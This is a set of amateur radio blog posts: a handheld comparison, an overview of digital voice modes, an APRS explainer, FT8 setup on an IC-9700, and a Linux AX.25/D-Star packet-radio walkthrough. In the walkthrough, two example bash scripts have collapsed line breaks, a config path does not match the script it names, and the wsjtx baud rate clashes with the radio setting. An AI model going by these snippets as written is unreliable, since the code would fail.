The AnyTone 878UV is famously loud. And yeah, it’s really loud if you turn it up.

RF Performance

Due to the pandemic I’ve not been able to compare much in the field. And I can’t reach any repeater from inside my flat.

I did some indoor tests though for reception. I set my USRP B200 to transmit a solid FM tone, and went into another room to pick up the signal with various radio configurations.

It’s very close, but it sounded like the FT3D was slightly better at picking up the tone. I’m not sure if this is because the speaker on the D74 seems to have more base, and the base noise might have drowned it out a bit. The general sound profile reproduction is different enough that my untrained ears can’t be sure. So call it mostly a tie.

They were both much better than the AnyTone 878UV, and my Beofengs. In fact I think the AnyTone was probably worst of all.

I tested both on 2M and 70cm, and swapped around antennas between the stock ones and a Diamond SRH940.

Again, I wouldn’t call these exhaustive or even objective tests. Ideally they should at least be done with headphones to remove the speaker from the equation.

I checked RF harmonics on VHF using a 200MHz/1Gsps oscilloscope (Hantek DSO4202P), and as expected saw no noticeable harmonics on FT3D, D74, or the AnyTone. The Baofengs were a different story, so I could confirm that the measurement method works.

Headphones

If you want to plug in normal headphones then unfortunately both of these radios make you build your own cable. The connector for mic/speaker is a combination one that also has PTT, so if you just plug them in you’ll start transmitting nonstop.

I’ve not yet built a cable for the FT3D, because at least for now I’m happy with the FT3D bluetooth support for headphones. The D74 bluetooth doesn’t work at all with my Bose QC35s, so there I have to use my custom cable.

Durability

The FT3D feels more sturdy. But on the other hand my D74 has had a couple of big bangs, including dropping 2 meters landing on a big rock, and has survived great with only a couple of scratches.

For any HT I recommend these paracord carabiners, to reduce the amount of droppage.

So which one should you buy?

Buy the one you whose digital system you want access to. If your local repeaters are C4FM, get the FT3D. If you’re in D-Star land, get the D74.

For analog, I’d say the D74 is much nicer. Quick to program. APRS much nicer to operate both for position and messaging.


Amateur radio digital voice

$
0
0

It’s a mess.

This post is my attempt at a summary of amateur radio digital voice modes, and what I think of them.

I’m not an expert, so if you have more experience then your opinion is likely more valid than mine. But hopefully at least I’m getting the facts right. Please correct me where I’m mistaken.

Analog and digital voice

In the beginning there was only analog. Traditionally on HF you used SSB, and on VHF/UHF you use FM. Analog works, and while yes there are different modes, radios tend to support all of them, or at least the common ones (e.g. most VHF/UHF radios don’t support SSB, because most traffic there is FM). Usually HT traffic is VHF/UHF FM, and for SSB while there is LSB and USB, radios will support both.

But analog isn’t perfect. By going digital we can send metadata such as call signs, positions, and even pictures and files. And for audio quality digital will get rid of the static of analog noise. Digital works better for longer distances, uses less spectrum, and retains voice clarity much longer.

Yes, there’s a sharp cliff when digital voice modes can no longer reach. One second it sounds perfect, the next you can understand nothing. That’s the nature of digital. It works perfectly until it doesn’t work at all. But in the conditions where digital just barely works, analog is an awful mess of static where you only maybe can hear anything.

Digital also enables some fancy things I’ll describe, such as repeating across the Internet.

Analog amateur radio has EchoLink for doing similar things, but both because I’ve not used it, and because it’s not using digital modes, I won’t say more about that in this post.

Digital landscape

Here’s where the mess comes in.

There’s four different standards, completely incompatible (but see below about the OpenSpot3).

DMR, D-Star, P25, and C4FM/SystemFusion.

I’ve not used P25, so I don’t have anything to say about it. The rest are very alike, but not quite the same.

For simplex (direct radio to radio) they’re pretty much exactly the same. They sound about the same, they work the same (switch from FM to the digital mode, done), and there are no surprises.

D-Star and SystemFusion were designed heavily protected by patents (some of which are now expired), trade secrets, and (because of this) have a heavy tie to the radio manufacturer.

D-Star radios are sold by Kenwood and Icom. C4FM/SystemFusion is sold by Yaesu.

DMR has more vendors.

All three of these systems, unlike analog amateur radio, require you to register your callsign on a website, in order to use fully. They’ll work in simplex without it, but e.g. for SystemFusion Yaesu requires you to register an account with them to get full use of the system, inputting both your callsign and your radio serial number.

The patents, trade secrets, and login requirements to me go very much against the spirit of amateur radio. And I’ve ranted about that before.

Digital mode repeaters don’t need to decode the voice. They simply repeat and route the data as-is. This means you can build a repeater or write a reflector (see below) without being able to decode the voice, but it still feels wrong.

There are other digital voice modes, such as FreeDV. I wish every handset would support FreeDV, but not only do you currently need a computer to do FreeDV (thus it’s a different thing from what I’m describing here), operationally it’s also less interesting. FreeDV is a solution for simplex, or repeaters. For operators it’s less of a “system” that needs explaining. Implementors just need a codec2 implementation and to read the very short FreeDV spec, and that’s it.

So that’s why I’m staying with DMR, D-Star and SystemFusion in this blog post.

DMR

DMR is popular because of its licensing situation with multiple manufacturers, which drives down prices.

DMR came out of commercial radio, and is a bit strange when used for amateur radio.

It has features that don’t make sense for amateur radio. E.g. a radio can be sent a “kill code”, to be remotely disabled. That makes sense if your security guard accidentally triggers their radio every two seconds by the way they walk, and HQ can shut that interference down centrally. But with amateur radio there is no “centrally”. Each amateur radio operator is their own licensee.

DMR radios are programmed more “closed”. The programming software is meant to be used by an expert to create a set of configurations for the whole organization to be distributed to all users in departments, and a config is called a “Code Plug”. So think of it as the security guards getting radios with the “security guard code plug”. It doesn’t have to be programmed that way, but this is the use case they’ve made natural.

Many DMR radios can’t be put in frequency mode. The AnyTone 878UV can, but funnily it can’t show the frequency and channel name at the same time. You have to go into the menus to switch to showing one or the other.

So the experience of using a DMR radio is one where the expectation is that you are just handed a radio, with channels programmed, and you are to use those channels because that’s what your organization is licensed to do.

So DMR doesn’t feel like amateur radio. Which makes sense. It came from commercial radio, where these choices made sense.

DMR uses limited TDMA. There are two time slots. And instead of the PL tones of analog repeaters, it uses “color codes”, numbered 0-15.

DMR repeaters connect to “servers”, which belong to a “talk group” networks. Talk groups exist so that you can use the same repeater for your security guards as for your lighting crew, without them needing to hear each other. Pretty neat.

For amateur radio talk groups use a global database (assuming your repeater is connected to a server in the BrandMeister system. There are others I think). You can see the full list of BrandMeister, but for example:

  • Talk group 1 is “the local repeater”
  • Talk group 91 is “World-wide”, and has lots of activity
  • Talk group 2411 is “SM Tactical” (SM for Sweden), whatever that means

You can set up to listen to multiple talk groups in a a “receiver list”, when you’re tuned to a repeater. You won’t hear other talk groups when the repeater broadcasts them, unless you hold down the Monitor button if you have one. You also have a talk group set for when you push to talk (PTT). The active PTT talk group is implicitly in the recever list.

The first time you PTT with a new talk group to a repeater, it will realize that someone (you) is interested in that talk group and will start “subscribing” to it and broadcast it for your enjoyment.

This PTT system means that there are many MANY kerchunkings on DMR talkgroups, which interferes with actual conversation.

DMR doesn’t transmit much metadata. You’re only identified with your DMR ID (remember to register), and every receiver has to be programmed with the now ~160000 DMR IDs for your call sign to show up when you talk to people.

There was no problem registering. Annoying that you have to, but not a problem. Annoying also that you have to periodically reprogram your radio to keep the list of ~160000 DMR IDs up to date.

D-Star

D-Star was designed by the Japan Amateur Radio League, so was for amateur radio from the beginning. At the time it was apparently not feasible to actually have an open standard, so the voice codec was a proprietary patented one, and you had to pay $25 for a chip to be able to encode/decode it.

There’s some open source code out there now, so maybe in the future more radios will get it. Though I don’t see Yaesu adding it, even if it’s free. They want to continue pushing their own closed system.

D-Star merges “servers” and “talk groups” into one thing, and calls it “reflectors”. So a repeater or hotspot is connected to a reflector, and that is the group that you are chatting with. Much simpler.

It’s polite to ask on the repeater if anyone minds if you link the repeater to another reflector (unlinking whatever reflector it’s currently linked to) before you key that in, but you can do it directly from your radio. Some repeaters may be locked to a specific reflector.

D-Star supports sending not only your call sign and name whenever you talk, but you can also embed your GPS coordinates if you want.

A popular reflector is “30 Charlie” (REF030C). There’s a full list of official reflectors, but there are other sets of reflectors too, and you can even run your own.

You need to register to get started. I think otherwise reflectors will drop your traffic, but I’m not sure. One problem with D-Star is that you’re supposed to register via your local repeater. But if you’re on a hotspot because you don’t have any repeaters nearby, then it can be hard to get registered.

I had my registration rejected because it was not local, but after complaining to various places eventually my registration went through. I don’t know who pressed what button to fix it, because people were not exactly good at replying to my emailed requests.

C4FM/SystemFusion

SystemFusion is very similar to D-Star. Just incompatible. It also uses reflectors.

SystemFusion seems to have a more advanced system for querying metadata though. This may be part of what Yaesu calls “WIRES-X”. When you’re in range of a repeater you can leave voice, text, or photo messages on it, retrieve news, and get a list of reflectors. A handheld radio is not exactly great for browsing things, but it’s there and seems kinda cool.

Other than that, yeah for operators it’s D-Star, but not compatible. Registration was not a problem, unlike with D-Star.

P25

I may fill in this section when I have first hand experience with it. For now I have nothing to say.

Hotspot

If you don’t have a repeater near where you live, or you want to surf around reflectors / talk groups like a madman, then you can get a little gateway into the talk group / reflector systems.

How it works is that you use your normal radio, but instead of talking to a repeater you talk to your own little mini-repeater, that is your gateway between the Internet and radio. I say “repeater” but it can’t be used to repeat between two radios, only between the Internet and your radio.

You can build a repeater using two hotspots connected to the same reflector, and running on different frequencies, but hotspots don’t have high power, so this may be of limited use.

There are others, but just get the OpenSpot3. It does all three systems, and (unlike every other hotspot, including OpenSpot2), it does cross mode! It also has a built in battery, so with it’s wifi on the internet side, and RF to your radio, it’s extremely handy.

With it you can have a DMR radio, and cross mode so that you’re talking to people on a D-Star reflector. Pretty magic!

I have the OpenSpot2, which doesn’t have a battery or cross mode, but even that one is very awesome.

Comparing digital modes

To me they sound about the same. D-Star seems to have more variability between implementations, where some sound more robotic.

DMR is weird. I understand it to be the most popular, but it’s always clear that amateur radio was not the primary design choice for it.

D-Star and SystemFusion are both closed systems, in my opinion. But other than that pretty equal. SystemFusion/WIRES-X has fancy mailboxes, as described above.

You should use the system that has repeaters nearby, or the same system your friends use.

APRS

$
0
0

Another post in my burst of amateur radio blog posts.

To say that the documentation for APRS is not great is an understatement. What should be the best source of information, aprs.org, is just a collection of angry rants by the inventor of APRS, angrily accusing implementations and operators of using his invention the wrong way. There’s no documentation about what the right way is, just that everyone is wrong.

So here I’ll attempt to write down what it is, in one place, in an effort to both teach others, and for people who know more than me to correct me.

The best source of APRS information for me has actually been Kenwood radio manuals. See resources at the bottom.

APRS in short

APRS is a way to send short pieces of digital information as packets of data. The messages are:

  • Status about you
    • Your position (optionally not exact)
    • Your heading
    • Your QSY (frequency you’re tuned to if someone wants to call)
  • Weather reports
  • Status about “items” and “objects”. This is objects that are not you, and aren’t a radio. For example where the meeting point is, or a hurricane.
  • Short messages

The protocol

As an operator you don’t have to care much about what AX.25 is, or how it relates to X.25. But no explanation is complete without mentioning it.

As on operator there’s no need to read up much about this, so while I have links in this section, you don’t need to follow them.

AX.25 is a modified version of X.25 for Amateur radio operators. It can be used for “connections” just like dialing into a BBS, but APRS only uses connectionless packets. So I’ll say no more about “connections”.

Unless you’re programming your own implementation of APRS there’s no need to read the protocol specs. Suffice to say that APRS uses AX.25 connectionless packets for everything it does.

Block diagram of operating APRS

APRS diagram

Components:

  • GPS satellites send data to GPS receivers to tell them what time it is, and where they are.

  • A GPS receiver takes those signals and provides time and position coordinates

  • The APRS implementation periodically (or on demand, or using fancy algorithms to decide when) constructs position reports as AX.25 packets, and gives them to the TNC for transmission. Also the other types of packets, such as messages and object locations, are constructed here.

  • The TNC is a modem that turns packets into analog sounds. The digital side of the TNC uses an interface called KISS.

  • The radio takes the sounds and turns them into radiowaves.

  • WIDE1 digipeaters (repeaters of packets) are more local collectors of information, and repeat them so that they can be seen by a WIDE2 repeater.

  • WIDE2 digipeters are in a position to cover a wider area, but are otherwise just like other digipeaters. Exactly how much WIDE1 & WIDE2 repeat a packet is described below.

  • An IGate is a digipeater that may not actually repeat your packet over radio, but reports to some place over the Internet. Eventually somehow (I’m not clear on exactly how) it’ll be visible on aprs.fi.

The receiving path is just the revers path (except of course you don’t broadcast back to the GPS satellites).

Different radios require more or less extra hardware or software. See “How to send/receive APRS”, below.

Packet path

An APRS packet sent out has a path. For a handheld it’s usually WIDE1-1,WIDE2-1. This means that it should be repeated by both WIDE1 and WIDE2 digipeaters, and that it should only be repeated once (per type).

To demonstrate the repeat counter I’ll use WIDE1-2,WIDE2-2. If your WIDE1-2,WIDE2-2 packet is seen by a WIDE1 digipeater, it’ll repeat it as WIDE1-1,WIDE2-2. The WIDE1 counter (the second number) was decreased by one. Let’s say it’s then picked up by a WIDE2 digipeater. It’ll rebroadcast as WIDE1-1,WIDE2-1 (the WIDE2 counter having now been decremented). Another WIDE2 repeater hears it, and repeats it as (I’m not sure) either WIDE1-1,WIDE2-0, or just WIDE1-1.

NOTE: I’m not sure about exactly the content of the PATH as it propagates, but that is the general idea of how the counter works.

Actually WIDE2 digipeaters can simultaneously act as WIDE1, so if you only have WIDE1-1 in your path, and a WIDE2 digipeater hears it, it’ll still process and repeat it.

SSID

In order to support multiple radios per call sign, all sources and destinations are in the format of the callsign, a dash, and a number. This number is the SSID. E.g. I set M0THC-7 on my Kenwood D74, and M0THC-2 on my Yaesu FT3D. They don’t have to be different numbers, since when out in the field you’re probably not using two at the same time, so there will be no confusion.

Especially you won’t use two handheld radios in two different locations. If someone else is using your radio then they should program in their call sign, not yours, so you can use the same SSID.

I set different numbers because I often experiment with the two, and need to have different addresses for them, so that I can send messages between them.

The SSID is supposed to have meaning (e.g 5 is “smartphone”, 8 is “boats or maritime mobile”, 15 is “generic other”), but it’s just convention and you won’t break anything (to my knowledge) if you have to use the “wrong” SSID. There are enough “generic” SSIDs that you should be able to follow it though.

How to send/receive APRS

This depends on what hardware you have. If you have a radio with APRS and GPS support (e.g. Kenwood D74, Yaesu FT3D, AnyTone 878UV) then it can act as GPS receiver, APRS implementation, TNC, and radio all in one. Except the AnyTone can only send its position, not receive anything. See your manual for how to set that up. It’s a more or less pleasant experience, as I mentioned in my FT3D vs D74 review.

If you have a regular analog radio, such as Baofeng UV-5R, then from the diagram above it only implements the “Radio” bit. That’s fine, you don’t need more. You can run a software TNC such as Dire Wolf, which implements both APRS and the TNC.

You can set your radio to VOX, meaning it’ll start transmitting when the TNC sends audio to it. That way you don’t need to worry about pressing PTT to transmit.

Or you can use a Mobilinkd TNC, and which connects to a “computer” (your phone, which has a GPS receiver) over bluetooth, and triggers PTT “properly” instead of using VOX.

The radio then simply takes the sound it’s provided, and broadcasts. And of course it works the other way too, it receiving the data for decoding by the TNC.

APRS is done on 144.800 MHz in most of the world. The US uses 144.390MHz, and some other places use other frequencies. That’s one piece of information that aprs.org actually does provide.

APRS over JS8Call

JS8Call is a great low power slow transmission digital messaging protocol usually run on HF frequencies. JS8Call is FT8 but made for doing more than just exchanging signal reports.

Specially formatted JS8Call messages are picked up by IGates and forwarded over the Internet. That way you can be in the middle of nowhere. Literally anywhere on the planet with a decent view of the sky, and if HF propagation is good enough that day and time of day, you should be able to send your position for aprs.fi to display.

Curiously though, when I send out my location it shows up wrong on aprs.fi. Not sure why, but it’s off by a bit.

So this sends APRS messages without encapsulating APRS in AX.25. An example message sending an APRS message APRS over JS8CALL is @ALLCALL APRS::M0THC-7 :hello{01} (the number of spaces matter). See this repo for how to construct these messages)

Messages

Simple messages can be sent between APRS-capable handhelds by simply using their APRS addresses. E.g. I can send between my two handhelds by sending from M0THC-7 to M0THC-2. The message is retried a couple of times, until an acknowledgement is received.

Email

Like IGates repeating your position to the Internet, and WIDE1/WIDE2 digipeaters repeating over RF, there are special recipients that will forward your message through other mediums.

E.g. you can send short emails by sending a message to EMAIL-2. The message must begin with the destination email address, but you can teach EMAIL-2 about aliases by sending foo foo@bar.com, making foo an alias for foo@bar.com. A short alias makes you able to send slightly longer messages.

You can also receive emails (well, the subject line) this way, but only from addresses you’ve programmed in as aliases. In the example of foo above the email would be:

From: foo@bar.com
To: aprsemail2@ae5pl.net
Subject: M0THC-7:Hello this is the message

In the email body I must somewhere have exactly this:
  userid:foo:
The body of the email is not part of the message. It only needs to
contain the line above

So you can’t merely forward your emails to APRS. These are for short messages.

Sending SMS

Similarly you can send SMS via APRS. I’ve not tried it myself, yet. But there are videos on youtube.

Items and Objects

Aside from reporting your own position, you can also report the position of other things. This could be base camp (or another meetup point), or a something that moves, like a storm or a car (without a radio, since a car with a radio can broadcast its own location).

APRS is a… not great designed protocol, at least by modern standards. It has “Items” and “Objects”, but the difference between them is only their semantic meaning. They’ll show up on most software exactly the same. The only technical difference is that Objects can have timestamps associated with them, and Items can’t. Both can have a course and speed, and other data associated with them.

The specs say that Objects are for moving objects, and Items are for “things that are occasionally posted on a map”. That… doesn’t actually mean anything. Essentially the Items/Objects distinction is a layer violation.

Messaging the International Space Station

VHF/UHF doesn’t have great reach. It only works line of sight (mostly true. There’s sporadic E but it’s… sporadic. VHF/UHF gets its reach through repeaters, or for APRS that’s digipeaters. But you need line of sight to the digipeater, and a path to your recipient.

This is where satellites come in, and in particular the International Space Station (ISS).

You can bounce messages off of the ISS. It has a digipeater. It’s not on the standard APRS frequency, but on 145.825 MHz. This way you can reach really far in one hop.

Sure, terrestrial digipeaters with a correctly configured PATH can reach very far too, but bouncing on the ISS is a different level of cool.

I’ve not done this yet though.

Digital APRS

Everything described in this post is “analog APRS”. “Digital APRS” is a term for putting the data in another digital protocol (such as DMR), and sending your position that way.

Probably the JS8Call APRS above would be classified as “digital APRS”.

To learn more, here are the resources I’ve found useful

FT8 and IC9700

$
0
0

Setup

The basis for these instructions is this guide, but updated to reflect that the IC9700 is now directly supported by wsjtx and js8call.

Step one: connect a normal USB-A-B cable between the computer and the radio.

IC-9700 settings

  • Menu
    • Set
      • Connectors
        • MOD Input
          • USB Mod Level: 30% (default 50%)
          • DATA MOD: USB (default: ACC)
          • DATA OFF MOD: Leave as default (MIC, ACC)
        • CI-V
          • CI-V Baud Rate = 19200 (default: Auto)
          • CI-V address = keep default A2h
          • CI-V USB Port = Link to [REMOTE] (default: Unlink from [REMOTE])
          • CI-V DATA Baud Rate = 19200 (default: OFF)
  • When running, choose FIL1 (next to the mode in the top left)

wsjtx/js8call settings

  • Radio
    • Rig: Icom IC-9700
    • Baud rate: 9700
    • Data bits: 8
    • Stop bits: 1
    • Handshake: XON/XOFF
    • PTT method: CAT
    • Mode: Data/Pkt (USB also works, but will use DATA OFF MOD as audio, so that needs to be USB)
    • Serial port: /dev/ttyUSB0 (on my Linux machine at least)
  • Audio
    • Input: also_input.usb-Burr-Brown_from_TI_USB_Audio_CODEC-0.analog-stereo
    • Output: also_output.usb-Burr-Brown_from_TI_USB_Audio_CODEC-0.analog-stereo
  • Frequencies
    • Right click on the “Working frequencies” table and insert 144.174 and 432.065 for FT8. I’m not sure about the 70cm frequency, as I’ve not made contacts on it, and find conflicting information about the right frequency..

Glitches

I had the comms glitch for a bit, where wsjtx said frequency change commands were rejected. Unplugging/replugging and even restarting the radio didn’t help, but changing mode out of USB-D did. I don’t know if this was a one-off.

Performance

With a VX30 antenna on a first floor balcony I’m reaching surprisingly far:

Reach on 2m

Other tests have seen spots all over south of England and Wales.

I various tests with power levels between 5w and 40W. Sure, it’s nothing like on HF bands on 10w from the same, but that’s the nature of the bands:

Reach on 20m

Amateur packet radio walkthrough

$
0
0

An earlier version of this post that did data over D-Star was misleading. This is the new version.

This blog post aims do describe the steps to setting up packet radio on modern hardware with Linux. There’s lots of ham radio documentation out there about various setups, but they’re usually at least 20 years old, and you’ll find recommendations to use software that’s not been updated is just as long.

Specifically here I’ll set up a Kenwood TH-D74 and ICom 9700 to talk to each other over D-Star and AX.25. But for the latter you can also use use cheap Baofengs just as well.

Note that 9600bps AX.25 can only be generated by a compatible radio. 1200bps can be send to a non-supporting radio as audio, but 9600bps cannot. So both D-Star and AX.25 here will give only 1200bps. But with hundreds of watts you can get really far with it, at least.

I’ll assume that you already know how to set up APRS (and therefore KISS) on a D74. If not, get comfortable with that first by reading the manual.

DMR doesn’t seem to have a data mode, and SystemFusion radios don’t give the user access to send arbitrary payload. That leaves FM-modulated AX.25 and D-Star at 1200bps.

It’s really frustrating that none of the three digital amateur radio systems (D-Star, DMR, and SystemFusion) allow actually sending arbitrary digital data. Or at least their radios don’t.

Again, for an experimental learning hobby, it’s surprisingly closed.

My setup

I’ll connect a laptop to a D74 over bluetooth, and a raspberry pi to the 9700 over USB. I’ll use callsign M0XXX on the laptop, and 2E0XXX on the raspberry pi.

If you copy-paste, please make sure to replace these with your own call sign.

You don’t need to have two call signs to do this. I just did this to make it clearer to me (and this post) what’s where, and my old Intermediate call sign is still valid, so I can.

Technology stack

As I described a bit in my APRS blog post this will involve a TNC. Luckily the D74 has one built in. The ICom 9700 has USB serial, and D-Star data, but not a TNC.

With the 9700 you can set the second virtual USB port to be for DV Data. That’ll give you direct access for two-way communication across the D-Star data channel. But it’s ASCII only. For more details see page 10-22 in the IC-977 Advanced Manual.

So we’ll leave D-Star data for now. I’ll come back to it later on.

To get packet data working on the D74:

  1. Connect bluetooth serial device (or use an USB serial port)
  2. Get working KISS communication with the radio’s TNC over serial
  3. Connect the KISS port to the kernel to get AX.25
  4. Run services on top of AX.25

While setting this up, don’t forget to turn your TX power down to minimum. Likely it’ll still work for you too with a dummy load attached instead of an antenna, even on minimum power.

1. Connect bluetooth serial device

  1. Enable bluetooth on the D74 (menu-931)
  2. Route KISS and DV/DR to bluetooth (menu-983&984)
  3. Confirm your laptop has a bluetooth device
    laptop$ hcitool dev
    Devices:
        hci0   A0:51:0B:01:02:03
    
  4. Set the D74 in pairing mode (menu-934)
  5. Check that you can find the radio
    laptop$ sudo hciconfig hci0 piscan
    laptop$ sdptool add SP
    laptop$ hcitool scan
    [you should see the TH-D74 here]
    laptop$ export D74=00:11:22:33:44:55   # (the mac address you see)
    
  6. Test connect to the radio:
    laptop$ sudo rfcomm connect /dev/rfcomm0 $D74 2
    

    If it says it’s good, that’s a confirmation so we press ^C. If it doesn’t work, try inside and outside of pairing mode.

2. Get working KISS communication with the radio’s TNC over serial

  1. Set the system up to connect to the radio when anything opens /dev/rfcomm0:
    laptop$ sudo rfcomm bind /dev/rfcomm0 $D74 2
    
  2. Enable KISS12 (not KISS96) mode on the D74.
  3. To confirm that it works, start direwolf’skissutil, as a test:
    laptop$ mkdir tx rx
    laptop$ kissutil -p /dev/rfcomm0 -f tx -o rx
    
  4. Send a test message (make sure you use your own call sign, not M0XXX)
    laptop$ echo 'M0XXX-4>APDR15,WIDE1-1:=3807.41N/212006.78WbMESSAGE' > tx/msg
    

    This should send the message via AX.25 on VFO A. You should see kissutil confirming this, and the radio should transmit. If you have another radio capable of APRS then it should have received the packet.

That should confirm that the serial device is working. Now turn off kissutil.

Actually the quicker way that doesn’t require direwolf is to just run:

laptop$ echo -ne '\xC0\x00hello world from M0XXX\xC0' > /dev/rfcomm0

That is a simple way to send a packet using the KISS protocol.

Now you also know how to send arbitrary packets. And you can use Xastir with APRS from here and be done, if that’s all you wanted to do. Just point Xastir to /dev/rfcomm0 as a serial TNC device.

Xastir is an ancient program that uses 90s era UI components. If you’re not used to Motif-looking UIs you may think that it’s broken. But no it actually does work.

3. Connect the KISS port to the kernel to get AX.25

First you need to set up the AX.25 port.

laptop$ echo "radio M0XXX-1 1200 255 2 My D74 radio" | sudo tee -a /etc/ax25/axports

You’ll be able to override the window and packet sizes on a per-socket basis, so those two values are not that important for socket programming.

Then you can attach the port, thus turning your serial KISS port into an AX.25 packet interface:

laptop$ sudo kissattach /dev/rfcomm0 radio
AX.25 port radio bound to device ax0
laptop$ ifconfig ax0
ax0: flags=67<UP,BROADCAST,RUNNING>  mtu 255
        ax25 M0XXX-1  txqueuelen 10  (AMPR AX.25)
        RX packets 65  bytes 1361 (1.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 84  bytes 7884 (7.6 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

(you’ll have 0 packets in your counters, of course)

The D74 connected to the laptop is now set up and ready for AX.25 traffic.

You can set an IP address on the ax0 interface and try to use it directly. I don’t think that’s the best use of the connection, since while yes it did work, TCP/IP applications are very chatty, and don’t work well on a half duplex 1200bps wire.

You’ll have to tweak your TCP stack. Default Linux settings sent a second SYN packet just a fraction of a second after the first, under the assumption that it’d be lost. Woah there, cowboy. Patience.

Also you have to make sure on a modern system to stop all the chatty things trying to autodiscover what’s on this new interface you just connected. Not that amusing to have your radio be busy for a few seconds while SSDP tries to find what chromecasts you have attached.

For D-Star data you don’t need more software. But more on that later.

So now we set up direwolf, a software TNC.

To operate the push-to-talk we’ll first start rigctld:

raspberry$ rigctld  -m 3081 -r /dev/ttyUSB0 -s 19200

This needs to be from a fairly recent version of hamlib, since the 9700 hasn’t been supported for long. It’s a fairly new radio, after all. I also needed to download and compile direwolf, since for some reason the raspbian one didn’t have hamlib support.

My direwolf.conf looks like this, but check aplay -l for which sound card is the right one. Since it’s a virtual sound card built into the 9700, it’ll plobably be plughw:1,0. I have another USB sound card connected, so that’s why it’s 2,0.

ADEVICE plughw:2,0
PTT RIG 2 localhost:4532
CHANNEL 0
MYCALL 2E0XXX-4

Then start direwolf:

raspberry$ direwolf -p -t 0 -c direwolf.conf
[…]
Virtual KISS TNC is available on /dev/pts/8

The -p switch activates the KISS port, which we’ll need. Now attach it as an AX.25 port:

raspberry$ echo radio 2E0XXX-1 9600 255 2 My icom radio | sudo tee -a /etc/ax25/axports
raspberry$ kissattach /dev/pts/8 radio

Now the raspberry should also have a working ax0 interface.

Try assigning an IP address and see if the radios light up. Remember: patience.

4. Run services on top of AX.25

While debugging it can be very useful to run axlisten -a on both machines. It’s tcpdump for AX.25. tcpdump does work on the ax0 interface, but it can only capture, not decode. So it’s of limited use. Wireshark can read any captured pcap files though.

The config /etc/ax25/axports seems to mainly define the radio and the “main call sign”. Even though I defined 2E0XXX-1 on the raspberry pi in that file, the other SSIDs are still usable if you make sure to add 2E0XXX-1 as the path.

The multiplexer of services (think “TCP ports”) of this system is the SSIDs when setting up ax25d.

ax25d is an inetd-like multiplexer, allowing you to write simple programs that read from stdin and write to stdout, and thereby create interactive applications. Then you can have 2E0XXX-2 show a funny message, 2E0XXX-3 have a shell, 2E0XXX-4 be a chat system, etc…

Non-interactive program

Let’s say this is our program, stored in /home/pi/name, and executable:

#!/usr/bin/env bashecho Hello world
# sleep so that the output doesn't disappear before we've seen it,# when axcall exits.exec sleep 10

Then we can set up 2E0XXX-3 to be that program:

raspberry$ sudo emacs /etc/ax25/ax25d.conf
[2E0XXX-3 VIA radio]
default  * * * * * *  * pi /home/pi/hello hello

Then start ax25d -l as root.

You should now be able to “dial” into that “port”:

laptop$ axcall radio 2E0XXX-3
[full screen window should open, showing that hello world]

Interactive program

Sure, that’s cool. We can display a message, or even stream some data. But let’s get some interactive stuff going!

Unfortunately axcall uses CR-terminated newlines instead of NL, so most programs won’t “just work”.

So i hacked together a wrapper that sits between ax25d and the program, and replaces CR with NL.

This allows this simple interactive “server”:

#!/usr/bin/env bashecho Hello world
read NAME
echo"Hello ${NAME}"# sleep so that the output doesn't disappear before we've seen it,# when axcall exits.exec sleep 10
raspberry$ sudo tee -a /etc/ax25/ax25d.conf
[2E0XXX-5 VIA radio]
default  * * * * * *  * pi /home/pi/nlwrap -e /dev/stdout name /home/pi/name
^D
rapsberry$ sudo pkill -HUP ax25d

The -e /dev/stdout redirects the subprogram’s stderr to also be shown in the stream. Annoyingly it will otherwise simply be shown on the terminal where you happened to start ax25d, even though ax25d runs in the background.

You should see the ports if you run netstat --protocol=ax25.

Now dial into this new port:

laptop$ axcall radio 2E0XXX-5
[you should now be talking to the interactive "BBS" you've made]

D-Star

D-Star will provide a streaming interface more than a packet one. And it’ll only allow “ASCII”. Specifically 0x11 and 0x13 will be filtered out, as they are part of XON/XOFF on the virtual serial port.

For the story of me finding this out, see this post.

Sure, you can build packet data on top of just printable characters, but if you base64 encode then you’ll lose even more of the 1200bps.

But here’s how to set up the data channel. First pkill kissattach on both computers, to give you back the serial ports and prevent irrelevant traffic

Configure the D74

  1. Turn off KISS mode on the D74 (F,5, until it doesn’t say APRS or KISS)
  2. Select VFO B (A/B button)
  3. Switch mode to DV/DR (click Mode until you get DV or DR)
  4. Turn DV/DR mode to DV (F,Mode, DV/DR)
  5. Tune VFO B to a frequency you want to use
  6. Switch to data mode (F-Mode, Voice/Data). Note that it’ll switch back to Voice if you switch out of D-Star mode and in again.

Configure the ICom 9700

  • Menu->Set->Connectors->USB (B)/Data function
    • USB (B) Function: DV Data (default: OFF)
    • DV Data/GPS Out Baud Rate: 9600 (default)
  • Menu->Set->DV/DD Set
    • DD TX Inhibit (Power ON): OFF
  • Set the radio to DV mode

And restart the radio. You can also press the CALL button to turn off DD TX Inhibit without restarting,

Send/receive data

raspberry$ minicom -s
# set device /dev/ttyUSB1 (/dev/ttyUSB0 is the main control port for
# the 9700, /dev/ttyUSB1 is the DV Data stream as we've configured it).
# Set baud rate 9600, 8N1. XON/XOFF
laptop$ minicom -s
# set device /dev/rfcomm0.
# Set baud rate 1200, 8N1. XON/XOFF

You can also data from the command line:

raspberry$ cat /dev/ttyUSB1
laptop$ echo hello world > /dev/rfcomm0

I was surprised to see that the baud rate actually does matter, even though neither the D74 nor the 9700 use actual serial devices, but Bluetooth and USB, respectively. I think this may be the first time where serial over USB with the wrong baud rate has not “just worked” for me. Though I usually set it to what it’s supposed to be, so I may be off here.

Now start typing. As you type the radios should transmit.

I don’t know if this way of chatting has better range than AX.25. Because it’s the year 2020 it’s not the best time to do range tests.

More things you can do

IP over AX.25

Assign an IP address to the ax0 interfaces and start using IP over radio. With the hundreds of watts ham radio allows this beats the hell out of wifi. Except in speed, of course.

D-Star has a 128kbps mode too (still not wifi speed), but only on the 23cm band (1.2GHz). I only have one radio with 23cm (the Icom 9700), so have not been able to play with it. Maybe if I set up D-Star packet decoding with an SDR I’ll be able to do some fun there. Then it may be worth doing base64 or something on top of D-Star DV Data.

Keep in mind though that this is probably not as useful as you think. In most jurisdictions it’s illegal to obscure amateur radio signals, which means no encryption.

Authenticated BBS / IP

While encryption is not allowed (you’re not allowed to “obscure the meaning”), I don’t see a reason you can’t create an authenticated shell that sends commands signed by a private key. The meaning is not obscured.

I’ve created a library and some test programs for writing C++ that does just that. See the examples directory in axlib, or run axsh (shell) or axftp (file transfer) directly.

I built a protocol that should be replay-safe, and it uses ed25519 signatures.

